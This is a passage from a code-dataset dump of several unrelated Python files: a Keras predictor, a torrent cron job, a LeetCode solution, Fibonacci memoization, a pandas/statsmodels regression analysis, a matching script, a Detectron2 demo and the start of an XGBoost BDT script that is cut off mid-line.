SaiErNetwork.Identify.Config import *\nfrom numpy import argmax\nclass StartIdentify():\n def __init__(self,model=None,data=None):\n if data != None:\n self.data = data\n\n if model != None:\n y = self.getData()\n self.result = self.getResult(y,model)\n\n def getData(self,path = rootdir+'test23.csv'):\n test_data = read_csv(rootdir+\"test23.csv\", header=None)\n # # 测试集测试部分\n test = test_data.iloc[:, 0:15]\n # # 测试集的归一化操作\n scaler = Normalizer().fit(test)\n x_test = scaler.transform(test)\n # # 获取测试集,没有标签\n y = expand_dims(x_test, axis=2)\n return y\n\n def getResult(self,y,model):\n # 预测,返回一个列表,其中包含最大值---结果位置\n list = model.predict(y)\n # print(list)\n # 测试单个\n k = max(list[0])\n # print(k)\n # 1.7390638e-03\n for i in range(len(list[0])):\n if list[0][i] == k:\n return i\n\n def SaveResult(self):\n results = str(self.data)+\" \"+str(self.result)\n with open(rootdir+\"/Result.txt\",'a') as file:\n file.write(results)\n file.write('\\n')\n\n\n def Strtolist(self,list):\n TeZheng = list.split(',')\n return TeZheng\n\n\ndef LoadModel():\n # 读取json模式的model\n my_model = model_from_json(open(rootdir+'Network_Mode_Json1.json').read())\n # 读取权重\n my_model.load_weights(rootdir+'Network_Mode_Weight1.h5')\n\n my_model.predict(StartIdentify().getData(path=rootdir+'test234.csv'))\n return my_model\n","sub_path":"Ryu_migration_test/SaiErNetwork/Identify/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"228636994","text":"import click\nimport os\nimport django\n\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"cloud_project.settings\")\ndjango.setup()\n\n\nimport logging\n\nfrom torrents.utils.processors import check_done_torrents, add_new_torrents, check_dead_torrents\nfrom torrents.utils.transmission import tr_client\nfrom systemd.journal import JournaldLogHandler\n\nlogging.basicConfig(format=u'%(filename)s[LINE:%(lineno)d]# %(levelname)-8s [%(asctime)s] %(message)s',\n level=logging.INFO)\n\nlog = logging.getLogger('own.torrents.add-cron')\nlog.addHandler(JournaldLogHandler())\nlog.setLevel(logging.INFO)\n\n\n@click.command()\n@click.option('--add', is_flag=True)\n@click.option('--check_done', is_flag=True)\n@click.option('--check_dead', is_flag=True)\ndef main(add, check_done, check_dead):\n tr_torrents = tr_client.get_torrents()\n if add:\n add_new_torrents(tr_torrents)\n if check_done:\n check_done_torrents(tr_torrents)\n if check_dead:\n check_dead_torrents(tr_torrents)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"torrents/cron/add_torrents.py","file_name":"add_torrents.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"123622841","text":"\"\"\"\nhttps://leetcode.com/problems/maximum-profit-of-operating-a-centennial-wheel/\n\nSimulation.\nTime Comlexity: O(sum(customer)/4)\n\"\"\"\nclass Solution:\n def minOperationsMaxProfit(self, customers: List[int], boardingCost: int, runningCost: int) -> int:\n queue_customer = 0\n total_profit = [0]\n for c in customers:\n queue_customer += c\n n_board = min(4, queue_customer)\n queue_customer -= n_board\n total_profit.append(total_profit[-1] + n_board * boardingCost - runningCost)\n\n while queue_customer > 0:\n n_board = min(4, queue_customer)\n queue_customer -= n_board\n total_profit.append(total_profit[-1] + n_board * boardingCost - runningCost)\n\n max_profit = max(total_profit)\n if max_profit <= 0:\n return -1\n else:\n for i, p in enumerate(total_profit):\n if p == max_profit:\n return i\n","sub_path":"1599_MaximumProfitOfOperatingACentennialWheel.py","file_name":"1599_MaximumProfitOfOperatingACentennialWheel.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"298363309","text":"####### Fibonacci sequency #######\n# 1, 1, 2, 3, 5, 8, 13, 21, 34 .....\n\ndef check_number_for_fibonacci_calc(n):\n if type(n) != int:\n raise TypeError(\"The value must be a Integer\")\n if n < 1:\n raise ValueError(\"The value must be a positive Integer\")\n \n\n# calculate fibonacci given a number\ndef fibonacci(n):\n check_number_for_fibonacci_calc(n)\n if n == 1:\n return 1\n elif n == 2:\n return 1\n elif n > 2:\n return fibonacci(n-1) + fibonacci(n-2)\n\n\n# # Test function\n# for n in range(1,11):\n# print(n, \" > \", fibonacci(n))\n\n\n########## Apply explicitly memoization #######\nfibonacci_cache = {}\ndef fibonacci_optimized(n):\n check_number_for_fibonacci_calc(n)\n # if the value was computed\n if n in fibonacci_cache:\n return fibonacci_cache[n]\n \n # compute the new value\n if n == 1:\n return 1\n elif n == 2:\n return 1\n elif n > 2:\n value = fibonacci_optimized(n-1) + fibonacci_optimized(n-2)\n\n fibonacci_cache[n] = value\n return value\n\n\n# # Test function optimized\n# for n in range(1,101):\n# print(n, \" > \", fibonacci_optimized(n))\n\n\n########## Apply LRU cache #######\nfrom functools import lru_cache\n\n@lru_cache(maxsize = 1000)\ndef fibonacci_cached(n):\n check_number_for_fibonacci_calc(n)\n if n == 1:\n return 1\n elif n == 2:\n return 1\n elif n > 2:\n return fibonacci_cached(n - 1) + fibonacci_cached(n - 2)\n\n# # Test function cached\n# for n in range(1,201):\n# print(n, \" > \", fibonacci_cached(n))\n\n\n# Fibonacci division\nfor n in range(1,41):\n print(n, \" > \", fibonacci_cached(n+1) / fibonacci_cached(n))\n","sub_path":"python/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"370309172","text":"# -*- coding: utf-8 -*-\n# %% 配置\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport scipy.stats as st\nimport scipy.stats as stats\nimport statsmodels.api as sm\nimport matplotlib.pylab as plt\nfrom sklearn.preprocessing import OneHotEncoder\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\n\n\n# %% 读取数据\ndef read_and_chop(file_name, sheet_name, **kwargs) -> pd.DataFrame:\n \"\"\"读取并截取有效数据\"\"\"\n df = pd.read_excel(file_name, sheet_name=sheet_name, **kwargs)\n if df.iloc[-1, 0] == '数据来源:Wind':\n df = df.iloc[:-2]\n return df\n\n\ndf = read_and_chop('样本数据.xlsx', 'V1')\n# 输出的IO\noutput_name = '样本数据统计分析.xlsx'\noutput_io = pd.ExcelWriter(output_name)\n\n# %% 分行业情况\n# 行业数为1的记为其他\nindu_count_df = df.groupby(by='INDU')['INDU'].count()\nfor indu in indu_count_df.index[indu_count_df <= 1]:\n df.loc[df['INDU'] == indu, 'INDU'] = '其他'\n# 全样本的分行业情况\nindu_count_df = df.groupby(by='INDU')['INDU'].count()\nindu_count_df.to_excel(output_io, '分行业情况', startrow=0, startcol=0, index_label='全样本')\n# PE_YES = 1的分行业情况\nindu_pe_count_df = df[df['PE_YES'] == 1].groupby(by='INDU')['INDU'].count()\nindu_pe_count_df.to_excel(output_io, '分行业情况', startrow=indu_count_df.shape[0] + 2, startcol=0, index_label='PE_YES = 1')\n\n# %% 描述性统计\n# 连续变量CLIP\nclip_cols = [\n 'RELATIVE SIZE',\n 'LN_ASSET',\n 'LEV',\n 'BROE',\n 'GROWTH',\n 'FCFF',\n 'BLOCK',\n 'PE_RATIO',\n 'PE_TIME',\n 'STATE_OVER_PE_RATIO',\n]\nstart_row = 0\ndf[clip_cols] = df[clip_cols].clip(*np.percentile(df[clip_cols], [1, 99], axis=0), axis=1)\ndes_df = df.describe().T\ndes_df = des_df.drop(index='YEAR')\ndes_df.to_excel(output_io, '描述性统计', startrow=start_row, startcol=0, index_label='全样本')\nstart_row += des_df.shape[0] + 2\n# PE_YES = 1\npe_yes_df = df[df['PE_YES'] == 1]\ndes_pe_yes_df = pe_yes_df.describe().T\ndes_pe_yes_df = des_pe_yes_df.drop(index='YEAR')\ndes_pe_yes_df.to_excel(output_io, '描述性统计', startrow=start_row, startcol=0, index_label='PE_YES = 1')\nstart_row += des_pe_yes_df.shape[0] + 2\n# PE_YES = 0\nno_pe_yes_df = df[df['PE_YES'] == 0]\ndes_no_pe_yes_df = no_pe_yes_df.describe().T\ndes_no_pe_yes_df = des_no_pe_yes_df.drop(index='YEAR')\ndes_no_pe_yes_df.to_excel(output_io, '描述性统计', startrow=start_row, startcol=0, index_label='PE_YES = 0')\nstart_row += des_no_pe_yes_df.shape[0] + 2\n# t检验\nt_test = pd.DataFrame(\n index=des_df.index,\n columns=pd.MultiIndex.from_product([['PE_YES = 1', 'PE_YES = 0'], ['nobs', 'mean', 'std']]).append(\n pd.MultiIndex.from_product([['t_test'], ['stat', 'p_value']])\n ),\n)\nt_test[('PE_YES = 1', 'nobs')] = des_pe_yes_df['count']\nt_test[('PE_YES = 1', 'mean')] = des_pe_yes_df['mean']\nt_test[('PE_YES = 1', 'std')] = des_pe_yes_df['std']\nt_test[('PE_YES = 0', 'nobs')] = des_no_pe_yes_df['count']\nt_test[('PE_YES = 0', 'mean')] = des_no_pe_yes_df['mean']\nt_test[('PE_YES = 0', 'std')] = des_no_pe_yes_df['std']\nt_test[('t_test', 'stat')], t_test[('t_test', 'p_value')] = st.ttest_ind_from_stats(\n mean1=t_test[('PE_YES = 1', 'mean')],\n std1=t_test[('PE_YES = 1', 'std')],\n nobs1=t_test[('PE_YES = 1', 'nobs')],\n mean2=t_test[('PE_YES = 0', 'mean')],\n std2=t_test[('PE_YES = 0', 'std')],\n nobs2=t_test[('PE_YES = 0', 'nobs')],\n equal_var=True,\n)\nt_test.to_excel(output_io, '描述性统计', startrow=start_row, startcol=0, index_label='t_test')\n\n\n# %% 相关性分析\ndef get_stars(p_value):\n \"\"\"***、**、*分别表示在 1%、5%、10%的水平上统计显著\"\"\"\n return '***' if p_value < 0.01 else '**' if p_value < 0.05 else '*' if p_value < 0.10 else ''\n\n\ncorr_cols = [\n 'CAR1',\n 'CAR3',\n 'CAR5',\n 't1-t-1',\n 't2-t-1',\n 't3-t-1',\n 'PE_YES',\n 'PE_TIME',\n 'PE_UNITED',\n 'PE_REP',\n 'STATE_OVER_PE_RATIO',\n 'RELATIVE SIZE',\n 'CASHPAY',\n 'LN_ASSET',\n 'LEV',\n 'BROE',\n 'GROWTH',\n 'FCFF',\n 'BLOCK',\n 'STATE',\n]\ncorr_star_df = pd.DataFrame(index=corr_cols, columns=corr_cols)\nfor i in range(len(corr_cols)):\n for j in range(i + 1):\n col_1 = corr_cols[i]\n col_2 = corr_cols[j]\n corr, p_value = stats.pearsonr(df[col_1], df[col_2])\n stars = '' if i == j else get_stars(p_value)\n corr_star_df.loc[col_1, col_2] = f'{corr:.3f}{stars}'\ncorr_star_df.to_excel(output_io, '相关性分析', startrow=0, startcol=0, index_label='相关系数')\n\n\ndef plot_corr_matrix(corr_df, cmap='GnBu'):\n \"\"\"绘制xs相关系数矩阵热力图\"\"\"\n fig, ax = plt.subplots(1, 1, figsize=(8, 8))\n sns.heatmap(data=corr_df, ax=ax, cmap=cmap, square=True) # type: plt.Axes\n ax.set_title('相关系数热力图')\n fig.tight_layout()\n fig.savefig('相关系数热力图.png', dpi=300, quality=100)\n\n\ncorr_df = df[corr_cols].corr()\nrename_dict = {\n 't1-t-1': 'F1-F-1',\n 't2-t-1': 'F2-F-1',\n 't3-t-1': 'F2-F-1',\n}\ncorr_df = corr_df.rename(columns=rename_dict, index=rename_dict)\nplot_corr_matrix(corr_df, cmap='Blues')\n\n\n# %% 添加哑变量\ndef get_dummy(ind):\n \"\"\"生成哑变量,以最后一个为基准\"\"\"\n ohe = OneHotEncoder(categories='auto')\n ohe.fit(ind)\n return ohe.transform(ind).toarray()[:, :-1]\n\n\ndef creat_df_with_dummy(df):\n \"\"\"创建带有dummy的数据\"\"\"\n new_df = df.copy()\n # 行业哑变量\n ind_ohe_trans = get_dummy(new_df['INDU'].values.reshape((-1, 1)))\n for i in range(ind_ohe_trans.shape[1]):\n new_df['IND_{}'.format(i)] = ind_ohe_trans[:, i]\n # 年度哑变量\n year_ohe_trans = get_dummy(new_df['YEAR'].values.reshape((-1, 1)))\n for i in range(year_ohe_trans.shape[1]):\n new_df['YEAR_{}'.format(i)] = year_ohe_trans[:, i]\n return (\n new_df,\n ['IND_{}'.format(i) for i in range(ind_ohe_trans.shape[1])],\n ['YEAR_{}'.format(i) for i in range(year_ohe_trans.shape[1])],\n )\n\n\n# 创建哑变量\ndf, ind_dummy, year_dummy = creat_df_with_dummy(df)\ndf_mask, ind_dummy_mask, year_dummy_mask = creat_df_with_dummy(df[df['PE_YES'] == 1].reset_index())\n\n\n# %% 异方差检验\ndef het_test(y, xs):\n \"\"\"回归\"\"\"\n # 构建最小二乘模型并拟合\n xs = sm.add_constant(xs) # 截距\n model = sm.OLS(y, xs)\n res = model.fit()\n # White`s Test\n White_res = sm.stats.diagnostic.het_white(res.resid, model.exog)\n # BP Test\n BP_res = sm.stats.diagnostic.het_breuschpagan(res.resid, model.exog)\n return np.array(White_res), np.array(BP_res)\n\n\nctrl = [\n 'RELATIVE SIZE', 'CASHPAY', 'LN_ASSET',\n 'LEV', 'BROE', 'GROWTH',\n 'FCFF', 'BLOCK', 'STATE',\n]\nchar = [\n 'PE_TIME', 'PE_UNITED',\n 'PE_REP', 'STATE_OVER_PE_RATIO'\n]\ny_cols = ['t1-t-1', 't2-t-1', 't3-t-1', 'CAR1', 'CAR3', 'CAR5']\nx_cols = ['PE_YES'] + ctrl + ind_dummy + year_dummy\nx_cols_mask = char + ctrl + ind_dummy_mask + year_dummy_mask\nhet_test_df = pd.DataFrame(\n columns=y_cols,\n index=pd.MultiIndex.from_product([['模型1', '模型2'], ['White', 'BP'], ['lm', 'lm_p_value', 'f_value', 'f_p_value']])\n)\nfor col in y_cols:\n # 第一个模型\n het_test_df.loc[('模型1', 'White'), col], \\\n het_test_df.loc[('模型1', 'BP'), col] = het_test(y=df[col], xs=df[x_cols])\n # 第二个模型\n het_test_df.loc[('模型2', 'White'), col], \\\n het_test_df.loc[('模型2', 'BP'), col] = het_test(y=df_mask[col], xs=df_mask[x_cols_mask])\nhet_test_df.to_excel(output_io, '异方差检验', startrow=0, startcol=0, index_label='异方差检验')\n\n# %% 多重共线性检验\nvif_x_cols_1 = ['CONS', 'PE_YES'] + ctrl\nvif_x_cols_2 = ['CONS'] + char + ctrl\nmulti_test_df = pd.DataFrame(\n index=['CONS', 'PE_YES'] + char + ctrl,\n columns=['模型1', '模型2'],\n)\ndf['CONS'] = 1\ndf_mask['CONS'] = 1\nmulti_test_df.loc[vif_x_cols_1, '模型1'] = np.array([\n variance_inflation_factor(df[vif_x_cols_1].values, i) for i in range(len(vif_x_cols_1))\n])\nmulti_test_df.loc[vif_x_cols_2, '模型2'] = np.array([\n variance_inflation_factor(df_mask[vif_x_cols_2].values, i) for i in range(len(vif_x_cols_2))\n])\nmulti_test_df.name = 'VIF'\nmulti_test_df.to_excel(output_io, '多重共线性检验', startrow=0, startcol=0, index_label='多重共线性检验')\n\n# %% 储存\noutput_io.save()\n","sub_path":"describe.py","file_name":"describe.py","file_ext":"py","file_size_in_byte":8280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"156226650","text":"teacher_name = []\nstudent_name = []\n\nstudent_dict = {}\nteacher_dict = {}\n\npeople_num = 0\n\nstudent_list = []\nteacher_list = []\n\nans = {}\n\nfirst = input().split(',')\nfor i in first:\n teacher_name.append(i)\n people_num += 1\nstudent_list = [first]\n\nfor i in range(people_num - 1):\n n = input().split(',')\n student_list.append(n)\n\nfor j in range(people_num):\n n = input().split(',')\n teacher_list.append(n)\n\nfor j in teacher_list[0]:\n student_name.append(j)\nstudent_name = sorted(student_name)\nteacher_name = sorted(teacher_name)\n\nj = 0\nfor i in student_name:\n student_dict[i] = student_list[j]\n j += 1\n\nj = 0\nfor i in teacher_name:\n teacher_dict[i] = teacher_list[j]\n j += 1\n\n\n#print(student_dict)\n#print(teacher_dict)\n\n# order = 志願序位 int\n# todo = 待排學生 list\n# teacher = 空餘教授 list\ndef find(order, todo, teacher):\n #print(\"order\",order,\"todo\",todo,\"teacher\",teacher,sep = '\\n')\n #print(\"-----------\")\n #print(teacher_name)\n order_num = {}\n next_todo = todo\n for stu in todo:\n # stu 學生, 第 order 個志願序\n if student_dict[stu][order] in order_num:\n order_num[student_dict[stu][order]][0] += 1\n order_num[student_dict[stu][order]][1].append(stu)\n else:\n order_num[student_dict[stu][order]] = [1, [stu]]\n \n #print(\"order_num\",order_num,sep = '\\n')\n for teach in order_num:\n #print(\"-----------\")\n #print(teacher_name)\n #print(teach,order_num[teach])\n if teach in teacher:\n if order_num[teach][0] == 1:\n ans[order_num[teach][1][0]] = teach\n next_todo.remove(order_num[teach][1][0])\n #print(teach,order_num[teach])\n #print(teach, teacher)\n teacher.remove(teach)\n \n else:\n flag = 0\n for j in teacher_dict[teach]:\n for k in range(len(order_num[teach][1])):\n if j == order_num[teach][1][k] :\n ans[order_num[teach][1][k]] = teach\n next_todo.remove(order_num[teach][1][k])\n #print(teach,order_num[teach])\n #print(j,k,order_num[teach][1][k])\n #print(teach, teacher)\n teacher.remove(teach)\n flag = 1\n break\n if flag == 1:\n break\n if len(next_todo) != 0:\n find(order+1, next_todo, teacher)\n else:\n #print(student_name)\n for student in student_name:\n print(student,ans[student],sep = '->')\n\nfind(0, student_name.copy(), teacher_name.copy())\n# 100 finish","sub_path":"week_1/38.py","file_name":"38.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"374709032","text":"import detectron2\nfrom detectron2.utils.logger import setup_logger\nsetup_logger()\n\n# import some common libraries\nimport numpy as np\nimport os, json, cv2, random\n\nfrom detectron2 import model_zoo\nfrom detectron2.engine import DefaultPredictor\nfrom detectron2.config import get_cfg\nfrom detectron2.utils.visualizer import Visualizer\nfrom detectron2.data import MetadataCatalog, DatasetCatalog\nimport time\n\n\ndef frameProcessing(im, predictor, Visualizer, cfg):\n tick0 = time.time()\n outputs = predictor(im)\n tick1 = time.time()\n\n v = Visualizer(im[:, :, ::-1], MetadataCatalog.get(cfg.DATASETS.TRAIN[0]), scale=1.2)\n out = v.draw_instance_predictions(outputs[\"instances\"].to(\"cpu\"))\n cv_bgr = out.get_image()[:, :, ::-1]\n tick2 = time.time()\n print(tick1 - tick0, tick2 - tick1)\n return cv_bgr\n\ndef main(imagePath):\n \n im = cv2.imread(imagePath)\n\n cfg = get_cfg()\n # add project-specific config (e.g., TensorMask) here if you're not running a model in detectron2's core library\n cfg.merge_from_file(model_zoo.get_config_file(\"COCO-Detection/faster_rcnn_R_50_FPN_3x.yaml\"))\n cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.5 # set threshold for this model\n # Find a model from detectron2's model zoo. You can use the https://dl.fbaipublicfiles... url as well\n cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(\"COCO-Detection/faster_rcnn_R_50_FPN_3x.yaml\")\n predictor = DefaultPredictor(cfg)\n cv_bgr = None\n for i in range(5):\n \n cv_bgr = frameProcessing(im, predictor, Visualizer, cfg)\n\n cv2.namedWindow('input', cv2.WINDOW_NORMAL)\n cv2.namedWindow('output', cv2.WINDOW_NORMAL)\n\n cv2.imshow('input' ,im)\n cv2.imshow('output', cv_bgr)\n cv2.waitKey()\n cv2.destroyAllWindows()\n \n \nif __name__=='__main__':\n\n imagePath = './dog.jpg'\n main(imagePath)\n","sub_path":"inference_image.py","file_name":"inference_image.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"579532134","text":"import sys\nfrom pandas import DataFrame\n# 从公共模块中导入读取类,删除类,写入类\nfrom means import Read, Write, Delete\n\n'''执行方法:python pro1v2.py problem1.pk aim_name.pk'''\n\n\ndef find(div, num, key):\n \"\"\"\n div:DataFrame\n num:col值\n key:(0,1) == (div_cc,div_c_t)\n \"\"\"\n list1 = []\n # 寻到的index值都注入到列表中,通过判断len(list)来得出结论\n if key == 0:\n col = 'id_div'\n elif key == 1:\n col = 'id_div_cc'\n for i in div.index:\n if div.loc[i, col] == num:\n list1.append(i)\n return list1\n\n\ndef judge(i, div_tt):\n for k in div_tt['id_div']:\n if k == i:\n return False\n return True\n\n\ndef print_info(div, div2, div_cc, div_tt):\n print(\"div:%d, div2:%d, div_cc:%d, div_tt:%d\" % (len(div), len(div2), len(div_cc),len(div_tt)))\n\n\ndef main():\n file_name = sys.argv[1]\n aim_name = sys.argv[2]\n # 实例化读取类\n read = Read(file_name)\n # 解包接收返回的结果\n div, div_cc, div_tt, div_c_t, div2, div_cc2, div_c_t2 = read.read()\n print_info(div, div2, div_cc, div_tt)\n print('统计每个div_cc里面包含有多少个div_c_t的结果:')\n while True:\n flag = 0\n for i in div2.index:\n # i 代表了div2里面的index:id_div\n if div2.loc[i, 'x_value'] < 10 and judge(i, div_tt): # 选出需要拆分的div_cc标签对应的id_div为 i\n flag = 1 # 修改标志值,说明还进去处理过了\n count = 0\n '''根据id_div找出对应的div_cc,再根据div_cc找出对应的div_c_t(可能有多个)'''\n id_div = i\n\n # 需要提前把需要用到的(div,div2里面的值读出来)\n id_page = div.loc[id_div, 'id_page']\n x_value = div2.loc[id_div, 'x_value']\n y_value = div2.loc[id_div, 'y_value']\n\n # 返回的list一定只有一个值,因为id_div,id_div_cc是一一对应的\n id_div_cc = find(div_cc, id_div, 0)[0]\n id_div_c_t_list = find(div_c_t, id_div_cc, 1)\n sum1 = len(id_div_c_t_list)\n # 输出每个div_cc里面包含的div_c_t的个数,用于检测调试\n print(' ' + str(sum1) + ' ', end='')\n\n for j in id_div_c_t_list:\n '''得到的每一个 j 都是id_div_c_t'''\n count = count + 1\n if count == 1:\n '''说明此时处理的是div_cc里面的第一个div_c_t'''\n c_t_x = div_c_t2.loc[j, 'x_value']\n c_t_y = div_c_t2.loc[j, 'y_value']\n # c_t_x = div_c_t2['x_value'][i]\n # c_t_y = div_c_t2['y_value'][i]\n # 更新div2里面的值,写入div_tt里面一条记录\n div2.loc[id_div, 'x_value'] = x_value + c_t_x\n div2.loc[id_div, 'y_value'] = y_value + c_t_y\n # 给div_tt添加映射id_div\n div_tt = div_tt.append(DataFrame({'id_div': [id_div]}), ignore_index=True)\n elif (count <= sum1) and (count > 1):\n id_div += 1\n '''这样的限定条件暗示了不是第一个div_c_t了'''\n c_t_x = div_c_t2.loc[j, 'x_value']\n c_t_y = div_c_t2.loc[j, 'y_value']\n\n for k in range(len(div2), id_div, -1):\n div2.loc[k, 'x_value'] = div2.loc[k - 1, 'x_value']\n div2.loc[k, 'y_value'] = div2.loc[k - 1, 'y_value']\n\n # 给id_div指定的那一行赋值\n div2.loc[id_div, 'x_value'] = x_value + c_t_x\n div2.loc[id_div, 'y_value'] = y_value + c_t_y\n\n # 本质上向下移动了一行,会导致一部分的div_cc的id_div变大了1,所以针对\n # div_cc表,对于所有id_div>=我们本次添加的id_div,需要给他们多加1才可以。\n\n # 对div_cc的id_div进行修改\n for k in div_cc.index:\n if div_cc.loc[k, 'id_div'] >= id_div:\n div_cc.loc[k, 'id_div'] += 1\n\n # 给div表添加一个数据(id_div,id_page)\n # div表和div2表在index上应该是完全一致的\n for k in range(len(div), id_div, -1):\n div.loc[k, 'id_page'] = div.loc[k - 1, 'id_page']\n div.loc[id_div, 'id_page'] = id_page\n\n # 给div_tt添加数据,这是最简单的了\n div_tt = div_tt.append(DataFrame({'id_div': [id_div]}), ignore_index=True)\n\n if flag == 0:\n break\n\n # 下面就是解决删除问题:\n '''\n 1. 首先确定指标问题:我以什么为标准进行删除\n 2. 遍历div_tt里面的的id_div,明确里面的内容,有div_cc直接改为div_tt的,也有多余的div_c_t添加到div_tt里面的,\n 3. div_tt里面的id_div与div_cc里面的id_div是交集关系,相交的那一部分就是我们要删除的div_cc对应的id_div\n\n '''\n # 实例化删除类\n div_del = Delete(div_cc, div_c_t, div_cc2, div_c_t2, div_tt)\n div_cc, div_cc2, div_c_t, div_c_t2 = div_del.div_del()\n print('删除执行完毕,最终统计结果为:')\n print_info(div, div2, div_cc, div_tt)\n\n # 实例化重写文件类\n # 在主函数的开始我们就已经获取了aim_name\n id_frm = {'div': div, 'div_cc': div_cc, 'div_tt': div_tt, 'div_c_t': div_c_t}\n feature_frm = {'div': div2, 'div_cc': div_cc2, 'div_c_t': div_c_t2}\n write = Write(aim_name, id_frm, feature_frm)\n write.write()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"面试题/pro1v2.py","file_name":"pro1v2.py","file_ext":"py","file_size_in_byte":5969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"585466394","text":"#!/usr/bin/env python\n\nimport matplotlib.pyplot as plt\nimport xgboost as xgb\nimport numpy as np\nimport pandas as pd\nimport math\nimport pickle as pickle\nimport ROOT as root\nimport uproot\n\nimport sys, os\n\n#################\n##Preliminaries\n#################\n\nroot.gROOT.Reset()\n\nif __name__ == \"__main__\":\n\t#plotDir = \"/home/users/zhicaiz/public_html/WWZ/BDT/\"\n\tplotDir = \"../plots/\"\n\tos.system(\"mkdir -p \"+plotDir)\n\t\n\tfileDir = sys.argv[1]\n\tsample = sys.argv[2]\n\tfilterBDTvariables = \"yes\"\n\tmkplot = \"yes\"\n\tif len(sys.argv) > 3:\n\t\tmkplot = sys.argv[3]\n\tif len(sys.argv) > 4:\n\t\tfilterBDTvariables = sys.argv[4]\n\n\tFileName = fileDir + \"/\" + sample\n\tos.system(\"mkdir -p \"+fileDir+\".BDT\")\n\n\tFile = root.TFile(FileName)\n\tTree = File.Get('t')\n\tif Tree.GetEntries() < 1:\n\t\tos.system(\"cp \"+FileName+\" \"+fileDir+\".BDT/\"+sample)\t\n\t\tsys.exit(0)\n\n\tNevents = File.Get('h_neventsinfile')\n\n\t##Define variables to be used\n\tvariables_ttzzz_bVeto = ['met_pt','lep3Id','lep4Id','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis', \"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore']\n\tvariables_ttzzz_emu = ['met_pt','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis', \"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore']\n\tvariables_ttzzz_OffZ = ['met_pt','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis', \"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore']\n\tvariables_zz_emu = ['met_pt','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis']\n\tvariables_zz_emuHighTTZBDT = ['met_pt','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis']\n\tvariables_zz_OffZ = ['met_pt','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis']\n\tvariables_zz_OffZHighTTZBDT = ['met_pt','lep3Pt','lep4Pt','ZPt','lep3dZ', 'lep4dZ','lep3MT','lep4MT','lep34MT','phi0','theta0','phi','theta1','theta2','MllN', 'pt_zeta', 'pt_zeta_vis']\n\tvariables_ttz_nbAll = [\"nb\",\"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore', \"MllN\", \"lep3MT\", \"lep4MT\", \"lep34MT\", \"ZPt\"]\n\tvariables_ttz_bVeto = [\"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore', \"MllN\", \"lep3MT\", \"lep4MT\", \"lep34MT\", \"ZPt\"]\n\tvariables_ttz_emu = [\"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore', \"MllN\", \"lep3MT\", \"lep4MT\", \"lep34MT\", \"ZPt\"]\n\tvariables_ttz_OffZ = [\"nj\", 'minDRJetToLep3','minDRJetToLep4', 'jet1Pt', 'jet2Pt', 'jet3Pt', 'jet4Pt', 'jet1BtagScore', 'jet2BtagScore', 'jet3BtagScore', 'jet4BtagScore', \"MllN\", \"lep3MT\", \"lep4MT\", \"lep34MT\", \"ZPt\"]\n\tvariables_multi_nbAll = 